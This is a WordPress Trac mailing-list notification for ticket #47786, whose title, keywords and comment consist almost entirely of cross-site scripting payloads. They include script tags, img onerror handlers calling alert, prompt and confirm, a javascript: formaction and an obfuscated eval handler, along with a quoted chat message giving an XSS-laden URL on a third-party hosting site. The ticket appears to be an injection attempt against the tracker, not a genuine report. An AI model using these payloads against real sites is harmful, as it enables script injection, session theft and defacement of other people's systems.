[wp-trac] [WordPress Trac] #47786: ">><marquee><img src=x onerror=confirm(document.domain)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(document.domain) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29; >'"><img src="http: //i.imgur.com/P8mL8.jpg">)

WordPress Trac noreply at wordpress.org
Fri Jul 26 18:08:43 UTC 2019


#47786: ">><marquee><img src=x onerror=confirm(document.domain)></marquee>"
></plaintext\></|\><plaintext/onmouseover=prompt(document.domain)
><script>prompt(1)</script>@gmail.com<isindex
formaction=javascript:alert(/XSS/) type=submit>'-->"
></script><script>alert(1)</script>"><img/id="confirm(
1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http:
//i.imgur.com/P8mL8.jpg">)
-------------------------------------------------+-------------------------
 Reporter:  harry008                             |       Owner:  (none)
     Type:  feature request                      |      Status:  new
 Priority:  normal                               |   Milestone:  Awaiting
                                                 |  Review
Component:  General                              |     Version:  5.2.1
 Severity:  normal                               |  Resolution:
 Keywords:  [12:43 20/7/2019] Midhun S:          |     Focuses:
  "><img/src/onerror=.1|alert`XSS`> [12:43       |
  20/7/2019] Midhun S:                           |
  https://www.interserver.net/cancelmyserver.php?email=ssds1%27%22%3E%3Cimg/src/onerror=.1|alert`XSS`%3E|
  [12:43 20/7/2019] Midhun S:                    |
  %27;%0d%0d});%0d{onerror=prompt}throw          |
  document.location</ScRipT// has-patch          |
-------------------------------------------------+-------------------------
Changes (by harry008):

 * Attachment "DSCN0010_small.2.jpg" added.

 [12:43, 20/7/2019] Midhun S:
 https://www.interserver.net/cancelmyserver.php?email=ssds1%27%22%3E%3Cimg/src/onerror=.1|alert`XSS`%3E
 [12:43, 20/7/2019] Midhun S: %27;%0d%0d});%0d{onerror=prompt}throw
 document.location</ScRipT//

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/47786>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform


More information about the wp-trac mailing list